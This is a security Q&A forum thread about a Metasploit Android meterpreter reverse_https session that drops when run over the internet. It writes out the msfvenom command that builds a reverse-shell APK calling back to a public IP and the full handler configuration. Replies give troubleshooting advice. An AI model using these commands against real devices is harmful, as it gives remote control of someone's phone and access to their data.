0

Every time I use a meterpreter reverse https on an android phone over the internet, a session is created but after some seconds it says the session is not valid and it closes. When I do it on the LAN it works fine. So what is the problem? (The phone I'm testing the payload is using 4G connection)

When I create the payload I use:

 msfvenom -p android/meterpreter/reverse_https LPORT=4444 LHOST=<public_ip> -o /var/www/html/payload.apk.

On metasploit I use:

use exploit/multi/handler

set payload android/meterpreter/reverse_https

set lport 4444

set lhost local ip

set luri /

set ExitOnSession false

set SessionCommunicationTimeout 0

set SessionExpirationTimeout 0

exploit -j

After all this a connection is established but then closed. And sometimes when I create a new handler it creates infinite sessions for the same target, it just keeps creating them until I close the console, can someone help me?

schroeder
  • 123,438
  • 55
  • 284
  • 319
pedro santos
  • 153
  • 2
  • 12
  • We assume you set up port forwarding so that the external traffic can reach your handler? – schroeder Sep 26 '16 at 17:26
  • Yes, the handler makes a connection, but it closes after some time. – pedro santos Sep 26 '16 at 17:36
  • I'd run a packet sniffer on your handler to see what's going on. Perhaps your victim is killing the connection prematurely then starting it again? – schroeder Sep 26 '16 at 17:39
  • I'm doing it on my own phone, I download the payload to my phone, install it and then execute it and the connection is made and the meterpreter opens without the android module loaded and after some time the session closes – pedro santos Sep 26 '16 at 17:42
  • I'm confused. The target and your handler are both phones? Are they the same phone? And I assume the problem is when you use the 4G connection, but its fine when it is using wifi? – schroeder Sep 26 '16 at 17:49
  • im running the listener on my kali, and my phone is the target but now it seems it does not work with wifi, when I use my public ip in the lhost – pedro santos Sep 26 '16 at 17:52
  • then I would run a packet capture on your Kali listener to see what's going on – schroeder Sep 26 '16 at 17:53

1 Answers1

1

Also when testing for configuration issues I would set exitonsession to true.

if you are using your web browser to deliver the payload it can continue to run cycles until fails over.

setting the exitonsession will slow things down for you a bit, and stop creating so many sessions.

standarduser
  • 113
  • 3